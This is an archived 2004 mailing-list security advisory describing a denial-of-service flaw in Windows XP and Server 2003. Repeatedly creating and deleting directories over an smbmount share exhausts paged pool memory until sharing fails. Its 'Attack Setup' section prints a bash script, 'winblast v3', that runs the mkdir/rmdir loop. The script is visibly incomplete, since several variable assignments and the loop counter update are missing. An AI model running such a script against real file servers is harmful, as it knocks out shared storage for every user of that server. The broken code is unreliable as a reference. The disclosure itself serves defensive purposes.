smbmount disrupts Windows file sharing.

From: Daniel Kabs [ML] (
Date: 02/02/04

  • Next message: Casper Dik: "Re: RFC: virus handling"
    Date: Mon, 02 Feb 2004 16:40:48 +0100

    Announced: 2004-02-02
    Type: Denial of Service Attack on Windows
    Impact: smbmount can stop Windows from sharing files
    Writer: Daniel Kabs, Germany (
    Credits: Thanks to Steve Ladjabi (

    1. Abstract
    2. Affected Systems
    3. Attack Setup
    4. Symptoms
    5. Workaround

    1. Abstract

    A security vulnerability of "Windows XP" and "Windows 2003
    Server" has been found. Theses systems are open to a denial
    of service attack. If they share folders to a Unix client
    that is using smbmount (part of the Samba suite), any user
    on the client who has permissions to create directories on
    the mounted share can stop the Windows system from serving
    files. The attack induces a memory shortage on the Windows
    system by creating directories in a special way.

    2. Affected Systems

    This denial of service attack has been carried out
    successfully against
    - Microsoft Windows XP Professional, Service Pack 1
    - Microsoft Windows Server 2003

    Microsoft Windows 2000 Prof. and earlier versions of
    Windows are not affected by this attack.

    3. Attack Setup

    The attack was carried out successfully using
    - "Debian Linux", smbmount 3.0.0beta2
    - "Suse Linux 8.2", smbmount version 2.2.2
    as Unix clients

    The Windows system shares a folder. The Unix client mounts
    the share using smbmount. A user on the Unix client has
    write/create permissions to it the shared folder.

    The user on the client creates and deletes a lot of
    directories on the mounted share using the following

    # winblast v3 - DoS on WinXP, Win2003Srv
    # 2003-12-04 Steve Ladjabi


    # using 'pathcount' directories

    echo running \'winblast v3\' with $pathcount files in loop

    while [ 1 ]; do
      while [ "$p" != "$stop" ]; do
        # delete old directory if it exists, exit on any error
        if [ -d $dirname ]; then
          rmdir $dirname || exit 3

        # generating directory and exit on any error
        mkdir $dirname || exit 1
      echo $count directories generated ...
    #-- end --

    The script will create 1000 directories and then takes
    turns deleting and re-creating them. There will be no
    more than those 1000 directories at any time!

    Every time a directory is created, the Windows system
    allocates paged pool memory. This memory is not freed
    although the directory gets deleted.

    After having created and deleted 3.5 millions directories,
    the Windows system's paged pool memory has been depleted
    and it denies access to the share. One tested Windows XP
    system managed to take 5.8 millions directories until it
    stopped serving. This happens about 4 hours after the
    attack was started.

    4. Symptoms

    When the Windows system suddenly fails, it ceases serving,
    i.e. users can not access files nor list directory contents
    any more from the client. Any client will have lost its
    access the the share.

    On the Windows system the event log shows an error with
    event id 2020.

    Additionally, the Administrator of the Windows system can
    neither unshare the folder nor kill the session due to the
    lack of memory resources. Trying to open the managment
    console will result in error messages to this effect.
    Executing the command "net share /delete" fails due to
    the memory shortage.

    The only way to get the Windows system working again is
    to reboot it.

    Putting more RAM in the maching running Windows will not
    help as the paged pool memory is limited to 343MB. (See
    MS KB article Q312362).

    5. Workaround

    Administrator should schedule a daily reboot of the
    Windows system.

  • Next message: Casper Dik: "Re: RFC: virus handling"

    Relevant Pages